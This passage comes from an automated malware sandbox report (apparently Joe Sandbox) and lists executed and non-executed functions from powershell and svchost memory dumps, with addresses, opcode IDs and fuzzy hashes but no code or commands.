                                                                                      • Instruction Fuzzy Hash: 9E31487790E9CD8FDF128F6C58650E53FA0EF16604B0A02FBD0E84B0A3FD6565568741
                                                                                      Function 00007FFD9B9640BF Relevance: .1, Instructions: 99COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2040839241.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ffd9b960000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9c51f059c52251024292e3863bd4a4389876aaae70c47b33cb4358dcb86cd151
                                                                                      • Instruction ID: dfc7208bf37ac653c26061c9d89bb8b5dd928c3c3906b3870d1a5c5ffa345a4e
                                                                                      • Opcode Fuzzy Hash: 9c51f059c52251024292e3863bd4a4389876aaae70c47b33cb4358dcb86cd151
                                                                                      • Instruction Fuzzy Hash: FF21C222F2E98A9FE7B9DA98446227467C1EF65210B4B40BED05DC72A2DE18EC058341
                                                                                      Function 00007FFD9B9643BC Relevance: .1, Instructions: 62COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2040839241.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ffd9b960000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9dade3a3ea0a21dc736c6b28b6cb63cbfd044b6b21ca5527ea45584b37763321
                                                                                      • Instruction ID: d3ee35796e1b6bbed8ebd2979ad5e3984bc2754f9ec14729e52f4a8d6a9f4cca
                                                                                      • Opcode Fuzzy Hash: 9dade3a3ea0a21dc736c6b28b6cb63cbfd044b6b21ca5527ea45584b37763321
                                                                                      • Instruction Fuzzy Hash: 16110232F1F5499FE7B9D6989471AB477D0FF40720B4A00BEE02DC76A2DA18AD018340
                                                                                      Function 00007FFD9B8933B5 Relevance: .0, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2040135171.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ffd9b890000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                      • Instruction ID: 790f53b18bf535405e1566ca4fc67868e3ace26fd97990e01e1bad52e7daa871
                                                                                      • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                      • Instruction Fuzzy Hash: 7401A73020CB0C4FDB48EF0CE451AA6B7E0FB89320F10056DE58AC36A1DA32E882CB41

                                                                                      Non-executed Functions

                                                                                      Function 00007FFD9B8989FA Relevance: 6.4, Strings: 5, Instructions: 155COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2040135171.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ffd9b890000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: M_^$M_^$M_^$M_^$M_^
                                                                                      • API String ID: 0-2396788759
                                                                                      • Opcode ID: c28d86b4b5f6f04169fd1aa8350d5671e009043cf0e9a91a5d7983b12ee87e1f
                                                                                      • Instruction ID: 65a09a50aac1809405fc893608efb49bd095fef97e1e894cd74159bdec7f1da3
                                                                                      • Opcode Fuzzy Hash: c28d86b4b5f6f04169fd1aa8350d5671e009043cf0e9a91a5d7983b12ee87e1f
                                                                                      • Instruction Fuzzy Hash: 7841B262A0F6D75FEB6A476988790587FE0FF16B94B4A03F3C0D5CB0A3ED1929434242
                                                                                      Function 00007FFD9B898BFA Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000007.00000002.2040135171.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_7_2_7ffd9b890000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: M_^6$M_^<$M_^F$M_^I$M_^J
                                                                                      • API String ID: 0-1500707516
                                                                                      • Opcode ID: 041ac91ce1e2f866d46e9f53b52ae62d15ede3fa734e511d0ac2dfddc52e60c4
                                                                                      • Instruction ID: 698a88e157f5e3be547aa0b9edad8586613dc3d8c9d577c9a4451944f3587467
                                                                                      • Opcode Fuzzy Hash: 041ac91ce1e2f866d46e9f53b52ae62d15ede3fa734e511d0ac2dfddc52e60c4
                                                                                      • Instruction Fuzzy Hash: DF21F6A7704466DED30A76ADBC189DC7380DB9427A38947F3E169CB583FD14A08746C0

                                                                                      Executed Functions

                                                                                      Function 00007FFD9B966605 Relevance: 1.7, Strings: 1, Instructions: 439COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.2312722137.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_7ffd9b960000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: X7MR
                                                                                      • API String ID: 0-3463121620
                                                                                      • Opcode ID: 7027410556bef9281c881145a3e48db6e189ae22dba6f9634d9a599198b4703c
                                                                                      • Instruction ID: add168d78b9264ad30b81a00340e59a755e48e2c55f1ac2cf250a14a5dd02242
                                                                                      • Opcode Fuzzy Hash: 7027410556bef9281c881145a3e48db6e189ae22dba6f9634d9a599198b4703c
                                                                                      • Instruction Fuzzy Hash: ABD15732A1FB8E9FEBA59BA858655B57BE0EF52310B0901FFD44DC70E3D918A905C341
                                                                                      Function 00007FFD9B89644D Relevance: .7, Instructions: 711COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.2311627710.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_7ffd9b895000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 26f171ec96c838131793d3c87fa15292a03f583fdd2d95295149ced29e01f499
                                                                                      • Instruction ID: 81b71b770f79cfa880cf874363d84b16367049834170ccbdbc2a3101db4b4539
                                                                                      • Opcode Fuzzy Hash: 26f171ec96c838131793d3c87fa15292a03f583fdd2d95295149ced29e01f499
                                                                                      • Instruction Fuzzy Hash: 7AD19070A18A4D8FDF98DF58C465AE97BE1FF68340F1541AAD40DD72A6CB34E881CB81
                                                                                      Function 00007FFD9B964073 Relevance: .2, Instructions: 186COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.2312722137.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_7ffd9b960000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3942204f6c99aae6de48c7006d5ccda57e84a0be3bf4c12934c9d363bb234ae2
                                                                                      • Instruction ID: dbbad0e2d7f39abec3e7a916c79da928a25408cb2b833c0cb62992d8c57fe3cd
                                                                                      • Opcode Fuzzy Hash: 3942204f6c99aae6de48c7006d5ccda57e84a0be3bf4c12934c9d363bb234ae2
                                                                                      • Instruction Fuzzy Hash: CC514933B1EA8A9FEBA9DA9C542267477D1EFA5210B1A40BFC15DC72E3DE14EC058341
                                                                                      Function 00007FFD9B964370 Relevance: .1, Instructions: 148COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.2312722137.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_7ffd9b960000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bd808eb81e60e6563a7ffd64c49d1c692a35ff369eb85ba6fe2133acae2a77ff
                                                                                      • Instruction ID: e57979f5fde9001bb2baf176d9ce591fbb3dc25d2e5db105bcb948a3b4116980
                                                                                      • Opcode Fuzzy Hash: bd808eb81e60e6563a7ffd64c49d1c692a35ff369eb85ba6fe2133acae2a77ff
                                                                                      • Instruction Fuzzy Hash: 49413732B1EA499FEBB9D6A85431AB477D1EF81720B0901BFD05DC72E7EA15AD018381
                                                                                      Function 00007FFD9B899750 Relevance: .1, Instructions: 141COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.2311627710.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_7ffd9b895000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dbba9530308ad645f004afff06599bd9512dccf8347e6862ddd44b971ade6c87
                                                                                      • Instruction ID: 96c0ac9101b0ca48e6db44437c2ff1c87884f1fd2b7ab5e85d54977e619b0df1
                                                                                      • Opcode Fuzzy Hash: dbba9530308ad645f004afff06599bd9512dccf8347e6862ddd44b971ade6c87
                                                                                      • Instruction Fuzzy Hash: E041387190DB884FDB18DF5C9C0A6A87FE1FB99310F04416FE499C3292DA70A905CBC2
                                                                                      Function 00007FFD9B77E99F Relevance: .1, Instructions: 125COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.2310158711.00007FFD9B77D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B77D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_7ffd9b77d000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d8e1d5c82832ae70c34aabdfc8ac74f13fd8d5a24fa6fc24482527eca7ca531a
                                                                                      • Instruction ID: f1436f6af07fa9b8d672aebd7300835f117f586761703e5cb90fae405979e960
                                                                                      • Opcode Fuzzy Hash: d8e1d5c82832ae70c34aabdfc8ac74f13fd8d5a24fa6fc24482527eca7ca531a
                                                                                      • Instruction Fuzzy Hash: AD41E67150EBC44FD7569B2998919523FF0EF57220B1606DFE088CB1B3D625A84ACBA2
                                                                                      Function 00007FFD9B89A49C Relevance: .1, Instructions: 100COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.2311627710.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_7ffd9b895000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 128c2c91cef09f11c86ef780c886878d2f95ff304a84774f6b343c0341ef64bd
                                                                                      • Instruction ID: 7d1f0c7a4bae02c7a0ac6a8276c8c8f52d20798ad4ee0a98ac51c31ada040797
                                                                                      • Opcode Fuzzy Hash: 128c2c91cef09f11c86ef780c886878d2f95ff304a84774f6b343c0341ef64bd
                                                                                      • Instruction Fuzzy Hash: A421073190C74C8FDB59DFAC9C4A7E97FE0EB96321F04416BD048C3166DA74A81ACB92
                                                                                      Function 00007FFD9B9640BF Relevance: .1, Instructions: 99COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.2312722137.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_7ffd9b960000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d8022070178f3c59c60739a4cd9d6952b2979cb10bdf0166d6738d6342161f9f
                                                                                      • Instruction ID: 8d00e7c8002ad9fbd1e61d670bb8585223247ed125ef40fe981db99b24c1bc4e
                                                                                      • Opcode Fuzzy Hash: d8022070178f3c59c60739a4cd9d6952b2979cb10bdf0166d6738d6342161f9f
                                                                                      • Instruction Fuzzy Hash: 5021C222B2E98A9FE7B9DA98446227467C1EF71210B4B40BED05DC72A2DE14EC048341
                                                                                      Function 00007FFD9B9643BC Relevance: .1, Instructions: 64COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.2312722137.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_7ffd9b960000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f77e97c7f7679db451d70ca16fe3be9b56e6832662ac24b940bf42ae2860632e
                                                                                      • Instruction ID: f37cceee77b0f48a050b46e5686a429f876790c1770679782158121e267a6483
                                                                                      • Opcode Fuzzy Hash: f77e97c7f7679db451d70ca16fe3be9b56e6832662ac24b940bf42ae2860632e
                                                                                      • Instruction Fuzzy Hash: 73110232B2F58A9FE7B5D7989475AB87BD0EF40620B4A00BED05DC72A6DA19AC008341
                                                                                      Function 00007FFD9B8933B5 Relevance: .0, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.2311627710.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_7ffd9b890000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6b7eb879aeff2565d6fe36d34af01aa9e22e2b06d64cdbf2127ecae66d78e1e9
                                                                                      • Instruction ID: 790f53b18bf535405e1566ca4fc67868e3ace26fd97990e01e1bad52e7daa871
                                                                                      • Opcode Fuzzy Hash: 6b7eb879aeff2565d6fe36d34af01aa9e22e2b06d64cdbf2127ecae66d78e1e9
                                                                                      • Instruction Fuzzy Hash: 7401A73020CB0C4FDB48EF0CE451AA6B7E0FB89320F10056DE58AC36A1DA32E882CB41

                                                                                      Non-executed Functions

                                                                                      Function 00007FFD9B898BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.2311627710.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_7ffd9b895000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: M_^8$M_^<$M_^?$M_^J$M_^K$M_^N$M_^Q$M_^Y
                                                                                      • API String ID: 0-962139525
                                                                                      • Opcode ID: b260b10dca75ad829fffd06b38cce263ed1d75634052bcd1b6c8a74d1e912534
                                                                                      • Instruction ID: ad9997269ca045c2f6f29c292932e0e691c5b571fa522245f23bec43a457ca72
                                                                                      • Opcode Fuzzy Hash: b260b10dca75ad829fffd06b38cce263ed1d75634052bcd1b6c8a74d1e912534
                                                                                      • Instruction Fuzzy Hash: 2021C2B3B04525CAD30A36ACBC559D87780DF5437938603F3E029CF193F958A48B8A81

                                                                                      Executed Functions

                                                                                      Function 00007FFD9B8916D9 Relevance: .8, Instructions: 755COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2380280542.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd9b890000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b6d9983671ca29c58111c6e9c64fbe487f384237dd1dfc51eabe1099bbbe7263
                                                                                      • Instruction ID: 28a92143f5038ef471a414275f8142a95d715eb59d66b524aac9a97a5772807a
                                                                                      • Opcode Fuzzy Hash: b6d9983671ca29c58111c6e9c64fbe487f384237dd1dfc51eabe1099bbbe7263
                                                                                      • Instruction Fuzzy Hash: 3932B761B29A4D4FEB58FB7C98796B9B7D2FF98300F410579E01EC32D6DE28A9418341
                                                                                      Function 00007FFD9B892059 Relevance: .2, Instructions: 206COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2380280542.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd9b890000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fe3985a5aad6f9a994744a04c180e169c2c7b1f6c1b9fa2729ada0a6b5e570c0
                                                                                      • Instruction ID: af90e3c4ddfd361aa0da48ff5d44f1e829f350c4cac87b2b472a4f9d459bd6e5
                                                                                      • Opcode Fuzzy Hash: fe3985a5aad6f9a994744a04c180e169c2c7b1f6c1b9fa2729ada0a6b5e570c0
                                                                                      • Instruction Fuzzy Hash: C7511310B1E6C94FEB5AABB858746756FE5DF8B219B0900FBE0D9C71E7DD081806C342
                                                                                      Function 00007FFD9B891244 Relevance: .5, Instructions: 480COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2380280542.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd9b890000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0e3d3a7775fee0de790aca0f1f171c945979d60a792d061e30f99c7e1f9a382f
                                                                                      • Instruction ID: 480b391f37517675f7973f8466b5d48f58707e51a3ddf084595edf28bef1115e
                                                                                      • Opcode Fuzzy Hash: 0e3d3a7775fee0de790aca0f1f171c945979d60a792d061e30f99c7e1f9a382f
                                                                                      • Instruction Fuzzy Hash: EA21E722F0E7AA4FEB16B7ACACB54D97FB0EF41214B0901B7D095CB0E3ED1864468340
                                                                                      Function 00007FFD9B8909C8 Relevance: .2, Instructions: 235COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2380280542.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd9b890000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6b524ca96af850d83bd45a642040207e72e5c20a24cccefccac2e151fa9a31b3
                                                                                      • Instruction ID: 6ff506bc63a7c62d5ddeb642cebb87b75f8fd2b25335317a084d08a03c84e70a
                                                                                      • Opcode Fuzzy Hash: 6b524ca96af850d83bd45a642040207e72e5c20a24cccefccac2e151fa9a31b3
                                                                                      • Instruction Fuzzy Hash: BC614A62B1962A8FDB0ABBBCB8256ED7FA1EF85325F4441B7D118CB1D3CD246446C390
                                                                                      Function 00007FFD9B890E4E Relevance: .2, Instructions: 205COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2380280542.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd9b890000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 272dc3170cf55bd6de25b8824c55985f818f19aeaad938c44203a180d92e2a14
                                                                                      • Instruction ID: d3e562f58f32fa52188192df69e9913c956d28ccfa882f980d6fb957210324ab
                                                                                      • Opcode Fuzzy Hash: 272dc3170cf55bd6de25b8824c55985f818f19aeaad938c44203a180d92e2a14
                                                                                      • Instruction Fuzzy Hash: 27512721B1EA8A0FE356A77C982A5B93FE1DF86224B0940FBD08DC71E7DC0C5C468352
                                                                                      Function 00007FFD9B890AFB Relevance: .2, Instructions: 199COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2380280542.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd9b890000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4c5dc0ff3f63c87bf77fdc466710000ae6292c3c958bb400eb61c3ab5f48113e
                                                                                      • Instruction ID: 31a9d439b4ad4fb193f3a492565cd01457a8881179ccaed4d560b7734375e22a
                                                                                      • Opcode Fuzzy Hash: 4c5dc0ff3f63c87bf77fdc466710000ae6292c3c958bb400eb61c3ab5f48113e
                                                                                      • Instruction Fuzzy Hash: 62512772B199298FDB0ABB7CE8256ED7BA1EF88315F444077D108CB2D3DE7464468790
                                                                                      Function 00007FFD9B890620 Relevance: .1, Instructions: 137COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2380280542.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd9b890000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 043291a8f939c57dc807301b514cbc74f71096410882c26b6b5767c855cdb69c
                                                                                      • Instruction ID: 386dff9ba6c57f339a4006f7d95c6172b30912fabaaa66e87d685c23bc1d283d
                                                                                      • Opcode Fuzzy Hash: 043291a8f939c57dc807301b514cbc74f71096410882c26b6b5767c855cdb69c
                                                                                      • Instruction Fuzzy Hash: 9F310821B189480FEB9CEB6C9869678A7C2EF9C715F0505BEE04EC32E7DD14AC418341
                                                                                      Function 00007FFD9B890CE1 Relevance: .1, Instructions: 129COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2380280542.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd9b890000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dfdd7a60f5dc4b0c0d48d97b17dedc26594b8be55b7c75ae02e31ef45c4636f9
                                                                                      • Instruction ID: 95025bffb81b61f83d03ad5ec39e9e600e06fb03cb74d898df4997138a206678
                                                                                      • Opcode Fuzzy Hash: dfdd7a60f5dc4b0c0d48d97b17dedc26594b8be55b7c75ae02e31ef45c4636f9
                                                                                      • Instruction Fuzzy Hash: 0031B461B19A094FEB99B7BC5C297FC7AD1EF98651F1402BBE01DC32D7DD2869028381
                                                                                      Function 00007FFD9B890949 Relevance: .1, Instructions: 65COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2380280542.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd9b890000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c4938945cc17d5aeae6f23b27146802ce31720aab457c864e0a1d3d301547e8b
                                                                                      • Instruction ID: 8338654542284b9a8cd213ffd579302b9110d5ff86045273ba30dc6a955f983c
                                                                                      • Opcode Fuzzy Hash: c4938945cc17d5aeae6f23b27146802ce31720aab457c864e0a1d3d301547e8b
                                                                                      • Instruction Fuzzy Hash: 71119E2A6087B18EC707B7B8B8A45D8BB60DE4226971801F7C2CACE4879518648B87E1
                                                                                      Function 00007FFD9B892221 Relevance: .0, Instructions: 47COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000F.00000002.2380280542.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_15_2_7ffd9b890000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 693296616a38883fd4967fdb81d928aa5f1a3bb01a2444b0a93a0fa5cfb43f2e
                                                                                      • Instruction ID: 2fcce5b725d7b0c7534bd6aa2fe630a3ef9bfd7f65c66393f30f95d84e315e8f
                                                                                      • Opcode Fuzzy Hash: 693296616a38883fd4967fdb81d928aa5f1a3bb01a2444b0a93a0fa5cfb43f2e
                                                                                      • Instruction Fuzzy Hash: AC017B45E0E78A0FEB65A7F85C75431BFF0CFD9740B0904BAE888C60F7D8046A858382

                                                                                      Executed Functions

                                                                                      Function 00007FFD9B8A16D9 Relevance: .8, Instructions: 755COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.2503440546.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_7ffd9b8a0000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6d2d2f85e604c5130f445f81d53169034b32b7539cd66dd4787abffb76c2e3c3
                                                                                      • Instruction ID: 29ff8aa137b7ef19c3c1294bd9861f2cef6cc9ff57fa88e1c209338e9451aa59
                                                                                      • Opcode Fuzzy Hash: 6d2d2f85e604c5130f445f81d53169034b32b7539cd66dd4787abffb76c2e3c3
                                                                                      • Instruction Fuzzy Hash: 1332E861B29A494FE798FB7C98657B9B7D2FF9C340F4405B9E01EC32D6ED28A8018341
                                                                                      Function 00007FFD9B8A2059 Relevance: .2, Instructions: 203COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.2503440546.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_7ffd9b8a0000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3ebe6542046b3bb628bf5d50fb7693e9b45874f2623e2b657769d30821214f76
                                                                                      • Instruction ID: 9cb29160cbaf52e0b6a0d4598488d630288b64b1b1581cd16f40d21e0acb9868
                                                                                      • Opcode Fuzzy Hash: 3ebe6542046b3bb628bf5d50fb7693e9b45874f2623e2b657769d30821214f76
                                                                                      • Instruction Fuzzy Hash: 17510F10B0E6C94FD7A6ABB848346657FE1DF8B219B0900FBE0D9C71E7ED085806C352
                                                                                      Function 00007FFD9B8A1244 Relevance: .5, Instructions: 480COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000010.00000002.2503440546.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_7ffd9b8a0000_svchost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fb7dbd14ab50a746285872e778c8c4914d1efc5a168b3818634177a8d625230d
